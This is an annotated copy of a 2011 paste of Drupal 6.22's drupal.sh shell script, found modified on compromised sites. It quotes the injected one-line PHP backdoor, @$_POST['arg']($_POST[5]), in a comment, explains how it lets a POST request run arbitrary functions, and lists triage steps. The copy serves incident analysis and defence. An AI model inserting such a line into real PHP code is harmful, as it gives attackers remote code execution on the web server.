sgluskin

Drupal Site Intrusion

Sep 15th, 2011
  1. <?php
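  // This paste is being discussed at: http://groups.drupal.org/node/175979
  // Everything below this comment was part of the original file which was intrusively added to several Drupal 6.22 installs

  // NOTE(review): annotated copy of the sample. The only statement changed from
  // the paste is the injected call that followed the $script assignment: it is
  // commented out so this listing cannot act on request data, and its text is
  // kept verbatim as an indicator. Every other statement and the help text are
  // as pasted; the remaining comments marked NOTE(review) are annotations.

  /**
   * Drupal shell execution script
   *
   * Check for your PHP interpreter - on Windows you'll probably have to
   * replace line 1 with
   *   #!c:/program files/php/php.exe
   *
   * @param path  Drupal's absolute root directory in local file system (optional).
   * @param URI   A URI to execute, including HTTP protocol prefix.
   */
  // The first argv entry is the script's own name; it is only used in the help text.
  $script = basename(array_shift($_SERVER['argv']));

  // INJECTED BACKDOOR (disabled). As pasted, the next statement was:
  //
  //   @$_POST['arg']($_POST[5]);
  //
  // It reads a function name from the POST field 'arg', calls that function with
  // the POST field 5 as its only argument, and uses the @ operator to suppress
  // the errors raised when those fields are absent, so a normal run shows no
  // trace of it. Nothing else in this file reads $_POST, and the help text below
  // describes a command-line tool: the line only has an effect when the file is
  // requested over HTTP with a POST body, at which point the sender chooses the
  // code that runs under the web server's account.
  //
  // Triage and mitigation:
  //   - Compare every file of the install against a pristine copy of the same
  //     Drupal release and restore modified files from that known-good source.
  //   - Search the code base for calls whose function name is taken from a
  //     request superglobal ($_POST, $_GET, $_REQUEST, $_COOKIE).
  //   - Review web server access logs for POST requests to files under scripts/.
  //   - Deny web access to the scripts/ directory; these files are meant to be
  //     run from a shell only.
  //   - Treat the host as compromised: rotate site and database credentials and
  //     look for further modified or added files.

  if (in_array('--help', $_SERVER['argv'])) {
    echo <<<EOF

Execute a Drupal page from the shell.

Usage:        {$script} [OPTIONS] "<URI>"
Example:      {$script} "http://mysite.org/node"

All arguments are long options.

  --help      This page.

  --root      Set the working directory for the script to the specified path.
              To execute Drupal this has to be the root directory of your
              Drupal installation, f.e. /home/www/foo/drupal (assuming Drupal
              running on Unix). Current directory is not required.
              Use surrounding quotation marks on Windows.

  --verbose   This option displays the options as they are set, but will
              produce errors from setting the session.

  URI         The URI to execute, i.e. http://default/foo/bar for executing
              the path '/foo/bar' in your site 'default'.  URI has to be
              enclosed by quotation marks if there are ampersands in it
              (f.e. index.php?q=node&foo=bar).  Prefix 'http://' is required,
              and the domain must exist in Drupal's sites-directory.

              If the given path and file exists it will be executed directly,
              i.e. if URI is set to http://default/bar/foo.php
              and bar/foo.php exists, this script will be executed without
              bootstrapping Drupal.  To execute Drupal's cron.php, specify
              http://default/cron.php as the URI.


To run this script without --root argument invoke it from the root directory
of your Drupal installation with

  ./scripts/{$script}
\n
EOF;
    exit;
  }

  // define default settings
  // These values stand in for the web-request environment before $cmd is included.
  $cmd = 'index.php';
  $_SERVER['HTTP_HOST']       = 'default';
  $_SERVER['PHP_SELF']        = '/index.php';
  $_SERVER['REMOTE_ADDR']     = '127.0.0.1';
  $_SERVER['SERVER_SOFTWARE'] = 'PHP CLI';
  $_SERVER['REQUEST_METHOD']  = 'GET';
  $_SERVER['QUERY_STRING']    = '';
  // Overwrites the PHP_SELF value assigned a few lines above.
  $_SERVER['PHP_SELF']        = $_SERVER['REQUEST_URI'] = '/';

  // toggle verbose mode
  if (in_array('--verbose', $_SERVER['argv'])) {
    $_verbose_mode = true;
  }
  else {
    $_verbose_mode = false;
  }

  // parse invocation arguments
  // NOTE(review): the loop stops at the first argument PHP treats as false
  // (an empty string or '0'), so anything after such an argument is ignored.
  while ($param = array_shift($_SERVER['argv'])) {
    switch ($param) {
      case '--root':
        // change working directory
        $path = array_shift($_SERVER['argv']);
        if (is_dir($path)) {
          chdir($path);
          if ($_verbose_mode) {
            echo "cwd changed to: {$path}\n";
          }
        }
        else {
          echo "\nERROR: {$path} not found.\n\n";
        }
        break;

      default:
        if (substr($param, 0, 2) == '--') {
          // ignore unknown options
          break;
        }
        else {
          // parse the URI
          $path = parse_url($param);

          // set site name
          if (isset($path['host'])) {
            $_SERVER['HTTP_HOST'] = $path['host'];
          }

          // set query string
          if (isset($path['query'])) {
            $_SERVER['QUERY_STRING'] = $path['query'];
            parse_str($path['query'], $_GET);
            $_REQUEST = $_GET;
          }

          // set file to execute or Drupal path (clean urls enabled)
          // The leading '/' is stripped, so the file test is relative to the
          // current working directory (changed by --root).
          if (isset($path['path']) && file_exists(substr($path['path'], 1))) {
            $_SERVER['PHP_SELF'] = $_SERVER['REQUEST_URI'] = $path['path'];
            $cmd = substr($path['path'], 1);
          }
          else if (isset($path['path'])) {
            if (!isset($_GET['q'])) {
              $_REQUEST['q'] = $_GET['q'] = $path['path'];
            }
          }

          // display setup in verbose mode
          // NOTE(review): $_GET['q'] is not set when the URI named an existing
          // file and carried no q parameter, so the last echo can raise a notice.
          if ($_verbose_mode) {
            echo "Hostname set to: {$_SERVER['HTTP_HOST']}\n";
            echo "Script name set to: {$cmd}\n";
            echo "Path set to: {$_GET['q']}\n";
          }
        }
        break;
    }
  }

  // NOTE(review): $cmd is either 'index.php' or a path taken from a command-line
  // argument, so this include trusts whoever invokes the script. That assumption
  // holds for shell use only, which is another reason to keep the file out of
  // reach of the web server.
  if (file_exists($cmd)) {
    include $cmd;
  }
  else {
    echo "\nERROR: {$cmd} not found.\n\n";
  }
  exit();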